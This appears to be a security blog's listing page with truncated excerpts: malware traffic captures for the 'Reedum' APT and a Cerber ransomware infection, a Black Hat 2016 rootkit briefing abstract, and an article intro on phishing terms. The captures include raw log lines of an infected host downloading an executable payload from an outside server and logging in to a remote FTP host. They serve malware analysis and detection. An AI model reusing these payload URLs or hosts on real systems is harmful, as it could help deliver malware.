APT – Advanced Persistent Threat / MALWARE – Reedum – Historical Traffic Sample

1970-01-01 -4:-59:-35.7292 IP 10.0.2.15.1047 > 109.234.159.254.21: Flags [P.], seq 1:17, ack 62, win 64179, length 16
USER user37704
1970-01-01 -4:-59:-35.7292 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [.], ack 17, win 65535, length 0
1970-01-01 -4:-59:-35.7866 IP 109.234.159.254.21 > 10.0.2.15.1047: Flags [P.], seq 62:141, ack 17, win 65535, length 79
331 …

BLACK HAT 2016 USA VEGAS BRIEFING – HORSE PILL: A NEW TYPE OF LINUX ROOTKIT

Location: South Seas CDF
Date: Thursday, August 4 | 12:10pm-1:00pm
Format: 50 Minute Briefing
Tracks: Malware; Platform Security: VM, OS, Host and Container

What if we took the underlying technical elements of Linux containers and used them for evil? The result is a new kind of rootkit, which is even able to infect and persist in systems with …

Malspam E-mail Leads to Ransomware Cerber/Zerber Infection TRAFFIC SAMPLE

Example of files that were encrypted and protected:

The domain name ftoxmpdipwobp4qy.joa688.top returned NXDOMAIN (did not resolve) and was not required for the purchase process.

2016-12-16 01:29:05.256362 IP 192.168.1.102.50104 > 72.167.232.152.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET //up1/1/4fv3b5.exe HTTP/1.1
GET //up1/1/4fv3b5.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; …

Similarities and Differences in the terms Phishing, Malvertising, Spam and Malware E-mails

What is phishing? What are malvertising, spam e-mail and malware e-mail campaigns? These terms have become intertwined and are used interchangeably, which generally points to a lack of understanding in the IT community, and that is typical. Over time, laziness and improper training have a way of bending distinct security definitions into a single bundle. A great example …